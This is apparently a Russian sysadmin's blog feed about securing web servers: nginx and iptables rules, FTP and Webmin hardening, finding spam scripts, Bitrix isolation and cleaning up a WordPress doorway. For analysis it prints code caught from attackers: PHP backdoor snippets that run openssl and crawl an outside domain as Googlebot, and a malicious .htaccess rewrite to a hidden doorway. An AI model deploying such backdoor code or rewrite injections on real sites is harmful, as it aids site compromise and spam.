Нередко, в движках используют в скриптах подключаемые файлы с расширением отличным от php, что имхо очень неправильно и опасно.
Например в одном из движков (не буду тыкать пальцем каком именно) в темлейте подключают файлы с расширением .tpl которые не являясь активкой по умолчанию (интерпретатор настроен по умолчанию как правило на htm html php php5 и подобные), которые спокойно открываются в браузере в исходных кодах! а там уже есть чего поанализировать «плохим парням» 🙂
Другой пример — служебные файлы .git, старые резервные копии .bak .old … всё это часто забывают запретить в настройках аппача или nginx-а.

Соответственно, добавляем в nginx следующие строки, и спим спокойно

Сегодня с ужасом обнаружил, что на одном из моих серверов iptables пустая (был уверен, что настроено).
Соответственно, рецепт по переносу настроек с одного сервера на другой прост:
1. service iptables save на тот откуда тащим
2. перетаскиваем /etc/sysconfig/iptables
3. service iptables reload на том куда перетащили

P.S.
Отличная статейка по iptables

Вчера ломанули группу сайтов тупо по FTP — законнектились и сделали инжекты во все скрипты php и в html тоже …
Благо сработал скрипт сравнения версий файлов — вовремя отреагировал, всё восстановил.
Причём подозреваю в этом себя т.к. ломанули сайты разные и ко всем у меня был прописан доступ в FAR-е 🙁 (хотя не факт)
Итак:
1. Не храним доступ в открытом виде, не ленимся вводить пароль (очень для меня трудно-исполнимый пункт)
2. Меняем стандартный порт доступа FTP на нестандартный (в конфиге сервера listen).
3. Ограничиваем доступ FTP по IP адресу (заливали файло в левых IP) — в моём случае VSFTPD не позволяет прописывать доступ по IP, поэтому сделаем боле правильно — запретим/разрешим доступ на уровне фаервола iptables

сначала посмотрим текущие
iptables -L INPUT —line-numbers
находим и убираем старое правило
iptables -D INPUT номер
добавляем новое iptables -A INPUT -p tcp -s 192.168.0.0/24 —dport 22 -j ACCEPT
(IP и маску пишем свои — откуда будем цепляться)
service iptables save
service iptables restart

у меня не сработало, т.к. правило добавилось в конец, после запрета всех
пришлось поправить порядок вручную
/etc/sysconfig/itrables.save
service iptables restart

Собственно, в логах увидел приличный перебор паролей по 10000 порту (webmin).
Решил поменять порт доступа для пущей секъюрности.

Лезем в настройки /etc/webmin/miniserv.conf
правим две строчки port=10000 и listen=10000
Перезагружаемся /etc/init.d/webmin restart

Разрешаем новый порт
su
iptables -I INPUT -p tcp —dport НОВЫЙ_ПОРТ -m state —state NEW -j ACCEPT
service iptables save
service iptables restart

Нашел давеча скрипт спамер на одном из хостингов с помощью обновлённой статейки Как найти php скрипт — mail спамер?
Сразу же вопрос — может ещё чего прокинули одновременно с пробросом данного скрипта, решил найти все файлы созданные/модифицированные этим же днём, что и найденный скрипт.
К удивлению на мой запрос «поиск файлов по дате изменения linux» в поисковиках я находил только поиск изменённых за последние N дней, или раньше чем файл — т.е. конкретно поискать за 11 Октября никак.
Пришлось включать голову и изобретать велосипед 🙂
Решение придумалось такое:

ls -alR | grep «Oct 11» > res.txt

выводим список всех файлов, включая поддиректории, фильтруем по нужному числу — результат кидаем в res.txt для дальнейшего изучения

P.S.

Не забываем ещё поискать по содержимому.

В продолжение моей же статьи Битрикс — несколько сайтов на хостинге. Разграничение доступа
Итак, незнаю почему я в прошлой статье и вообще на протяжении всего этого времени я тупил на предмет «…Запереть аппач в root директории сайта возможности нет… ЧТО ДЕЛАТЬ?…» даже не скажу.
Ведь стандартную open_basedir никто не отменял и почему я в своё время посчитал невозможным её использование уже не припомню.
Единственная проблема — это то, что Битрикс по умолчанию хранит файлы сессий и темовые файлы в папке расположенной вне папки сайта, соответственно при использовании open_basedir сайт не сможет работать. Переопределяем эти переменные на вновь созданную папку, врубаем open_basedir и вуаля — скрипты сайта заперты в домашней папке сайта — зараза с одного сайта уже не переползёт на другой!
Если, что конфиги сайтов аппача лежат в /etc/httpd/bx/conf/

Для проверки закинул сам себе wso2.php — на верхний уровень нет.
Вообще, по-хорошему, нужно переопределить структуру файлов так, чтобы темповая папка была не в папке сайта, а чуть выше, а open_basedir был настроен на уровень выше.
Как то так:
./site-dir/temp
./site-dir/httpdosc

У одного из клиентов сайт частенько сайт начал «лежать», изучение логов показало множественные запросы (более 10) с одного и того-же IP адреса, которые и давали нагрузку на сайт.
Фронтендом у клиента стоял nginx — поэтому заблокировать подобную активность не составило никакого труда.
В этом мне помогли директивы limit_zone и limit_req.
Собственно, первое — в секцию httpd добавляем запись, ограничивающую активность до 2х запросов в секунду
limit_req_zone $binary_remote_addr zone=one:10m rate=2r/s;
В секцию обработки динамики собственно активируем нашу запись (зону созданную в httpd)
limit_req zone=one burst=3;

Вуаля, от «лоховских» ботов атакующих с одного и того-же IP мы защищены!
Кому интересно поподробнее — запрос «limit_req_zone» в помощь 🙂

P.S.
Чтоб случайно не «резануть» ботов, рекомендую добавить в robots.txt паузу в запросах от ботов в 1 секунду
Crawl-delay: 1

Чего-то хозяева бэкдора активизировались прямо — вчера домены парсили, сегодня тестят работу с гугулом по SSL.
Собственно, код (имхо полезный):


$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/dev/null", "a")
);
$cwd = '/tmp';
$process = proc_open('openssl s_client -crlf -connect pop.gmail.com:995', $descriptorspec, $pipes, $cwd, $env);
sleep(1);
if (is_resource($process)) {
// fwrite($pipes[0], 'USER hello');
fclose($pipes[0]);
$res=stream_get_contents($pipes[1]);
// var_dump($res);
if (stristr($res,"OK Gpop ready")){
echo md5("openssl");
}
fclose($pipes[1]);
$return_value = proc_close($process);
}

Общеизвестная информация по «нашим» доменам:
.RU https://partner.r01.ru/ru_domains.gz
.SU https://partner.r01.ru/su_domains.gz
.РФ https://partner.r01.ru/rf_domains.gz

Международники http://premiumdrops.com/zones.html
НО доступ 25$ в месяц — дороговато…

Так же у меня на «поплавке» висит переделанный бэкдор, который по идее должен исполнять посланный ему PHP код,
я же его просто изучаю и делюсь с тобой, уважаемый читатель — думаю у меня на это есть полное право 😉

Сегодня пришел такой довольно интересный код

set_time_limit(0);
ignore_user_abort(1);
if (@ini_get('open_basedir') or @ini_get('safe_mode')){exit;}
function curlu ($url,$ua,$cookie,$ref,$post) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 2);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
if (!empty($ref)) {
curl_setopt($ch, CURLOPT_REFERER, $ref);
}
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_NOBODY, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_MAXREDIRS, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
if (!empty($post)) {
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
}
if (!empty($cookie)) {
curl_setopt($ch, CURLOPT_COOKIE,$cookie);
}
$response = curl_exec($ch);
$header=substr($response,0,curl_getinfo($ch,CURLINFO_HEADER_SIZE));
$body=substr($response,curl_getinfo($ch,CURLINFO_HEADER_SIZE));
$resp['page']=$body;
preg_match_all("/Set-Cookie: (.*?)=(.*?);/i",$header,$res);
$cookie='';
foreach ($res[1] as $key => $value) {
$cookie.= $value.'='.$res[2][$key].'; ';
};
$resp['cookie']=$cookie;
$err = curl_error($ch);
$resp['inf'] = curl_getinfo($ch);
print_r ($resp['inf']);
curl_close($ch);
return $resp;
}

$ua="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)";
for ($i=0;$i<100;$i++){ $p=curlu("http://domain-kb.com/sitemap-index-2013.xml",$ua,"","",""); preg_match_all("/(.*?)<\/loc>/",$p,$match);
foreach ($match[1] as $mu){
$p2=curlu($mu,$ua,"","","");
}
}


Сегодня с «Инструменты для веб-мастеров» Гугла пришло письмо «Возможно, сайт взломан»
с указанием конкретной чужеродной страницы, по мнению Гугла!

И действительно, при открытии этой странички обнаруживаю рецепт маринованых огурчиков!
Яндекс в отличие от Гугла прекрасно скушал дорвей расположенный на моём сайте и даже поставил его в выдачу
(причём сразу на хорошие позиции! обидно — левость всякую в ТОП ставит, а то что нужно — хрен)

По методу взлома я пока писать ничего не буду, а вот принцип работы дора расскажу:

в .htaccess добавляется


RewriteEngine on
RewriteCond %{QUERY_STRING} ^do=(.*)$
RewriteRule ^(.*)$ /wp-includes/js/codepress/engines/jquery/%1


Как видно — непосредственно дор залили сюда /wp-includes/js/codepress/engines/jquery/

А теперь к самому важному — как правильно избавиться от заразы?!
Просто уничтожение дора, (в случае с WP) оставит работоспособной левую страничку с кодом 200 и главной в контенте.
Поэтому модернизируем правило


RewriteEngine on
RewriteCond %{QUERY_STRING} ^do=(.*)$
RewriteRule ^(.*)$ / [R=404]


всё — теперь по страницам дора отдаётся 404я! и это правильно